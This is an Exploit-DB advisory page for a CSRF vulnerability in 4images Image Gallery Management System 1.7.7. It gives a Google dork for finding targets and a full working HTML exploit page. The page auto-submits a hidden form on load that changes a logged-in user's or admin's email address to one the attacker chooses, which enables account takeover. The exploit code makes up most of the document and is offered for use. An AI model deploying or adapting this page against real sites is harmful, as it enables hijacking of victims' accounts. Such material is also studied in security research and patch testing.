4Images Image Gallery Management System - Cross-Site Request Forgery

EDB-ID:

18592

CVE:





Platform:

PHP

Date:

2012-03-13


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

########################################################################################################
# Title: 4images - Image Gallery Management System - [CSRF] Change mail user or admin  

# Author: Dmar al3noOoz  

# Mail : wafee_s[at]hotmail.com 

# Name : 4images - Image Gallery Management System

# dork : Google Dork: "4images - Image Gallery Management System"

# Software Link : http://www.4homepages.de

# Version: 1.7.7  
##############################################  Exploit  ##############################################  

<html>
<body onload="javascript:fireForms()">
<script language="JavaScript">
var pauses = new Array( "1062" );

function pausecomp(millis)
{
    var date = new Date();
    var curDate = null;

    do { curDate = new Date(); }
    while(curDate-date < millis);
}

function fireForms()
{
    var count = 1;
    var i=0;
    
    for(i=0; i<count; i++)
    {
        document.forms[i].submit();
        
        pausecomp(pauses[i]);
    }
}
    
</script>
<form method="POST" name="form0" action="http://www.XXXXXX.com/patch/member.php">
<input type="hidden" name="user_email" value="you mail"/>
<input type="hidden" name="user_email2" value="you mail"/>
<input type="hidden" name="action" value="updateprofile"/>
</form>
</body>
</html>



-=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=-Greetz-=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=-
-=- v4-team.com - Evil-Cod3r - dmar hacker - dr.Dmar - Dmaral7roOob - Ra7aLAlgnob - Mr.law - Alkeasr20 - Mr.black - Cyber-CrysTaL    -=-
-=-                                          Team 19vr - RootAl3noz - all Friend - exploit-db.com                                    -=-
-=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-